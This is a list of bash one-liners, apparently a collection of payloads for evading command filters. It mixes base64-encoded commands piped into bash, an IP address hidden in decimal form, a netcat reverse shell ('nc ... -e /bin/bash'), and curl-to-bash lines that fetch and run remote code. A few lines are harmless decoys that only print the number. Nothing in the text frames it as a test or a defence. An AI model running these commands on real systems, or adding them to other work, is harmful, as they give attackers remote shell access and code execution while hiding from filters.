bash -c "echo '2130706433' | awk '{print}' && perl -MMIME::Base64 -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "set -- 2130706433 && echo \$1 | xargs -I{} echo {} | perl -MMIME::Base64 -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "timeout 3 nc -n 2130706433 4444 -e /bin/bash"
bash -c "echo 2130706433 | perl -ne 'print \"fake ip: \$_\\n\"'"
bash -c "IPINT=2130706433; perl -e 'print scalar reverse(\"=EALWgU5d\")' | rev | base64 -d | bash"
bash -c "perl -e 'use Socket; print inet_ntoa(pack(\"N\",2130706433))' | xargs echo"
bash -c "curl http://2130706433:80/shell.b64 | base64 -d | bash"
bash -c "base64 -d <<<'dW5hbWUgLWE=' | bash #recoded-IP"
bash -c "read ip <<< 2130706433; echo \$ip | perl -ne 'print'"
bash -c "curl http://2130706433 | base64 -d | bash"
bash -c "HOST=2130706433 && ping -c1 \$HOST && echo 'dW5hbWUgLWE=' | base64 -d | bash"